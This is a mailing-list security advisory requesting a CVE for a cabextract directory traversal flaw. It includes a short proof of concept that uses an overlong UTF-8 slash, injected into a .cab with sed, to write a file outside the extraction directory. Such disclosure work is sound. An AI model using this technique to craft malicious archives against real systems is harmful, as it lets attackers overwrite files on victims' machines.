Date: Wed, 18 Feb 2015 13:11:55 +0300 From: Alexander Cherepanov <ch3root@...nwall.com> To: oss-security@...ts.openwall.com Subject: CVE Request: cabextract -- directory traversal Hi! cabextract is susceptible to a directory traversal vulnerability. While extracting files from an archive, it removes leading slashes from filenames but does it before possibly decoding UTF-8 and doesn't check for invalid UTF-8. Hence an absolute filename can be shoved through by using overlong encoding for the leading slash (and setting utf8 attribute in the header). This can be exploited by a malicious archive to write files outside the current directory. Illustration: $ touch xxxxxxxxxx $ lcab xxxxxxxxxx test.cab $ sed -i 's|\x20\x00xxxxxxxxxx|\xa0\x00\xe0\x80\xaftmp/abs|g' test.cab $ rm xxxxxxxxxx $ ls /tmp/abs ls: cannot access /tmp/abs: No such file or directory $ ./cabextract test.cab Extracting cabinet: test.cab extracting /tmp/abs All done, no errors. $ ls /tmp/abs /tmp/abs In the sed command above, \xe0\x80\xaf is an overlong encoding for '/', \xa0\x00 are flags updated to include utf-8 flag. The issue was found in cabextract 1.4 and 2-byte encoding (\xc0\xaf) was enough to hide '/'. cabextract 1.5 tightened utf-8 checks and 3-byte encoding is now necessary. The issue was reported to Stuart Caie today and fixed in less than 4h: http://sourceforge.net/p/libmspack/code/217/ Another release of cabextract is expected in the next few days. Could CVE please be assigned? -- Alexander Cherepanov
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.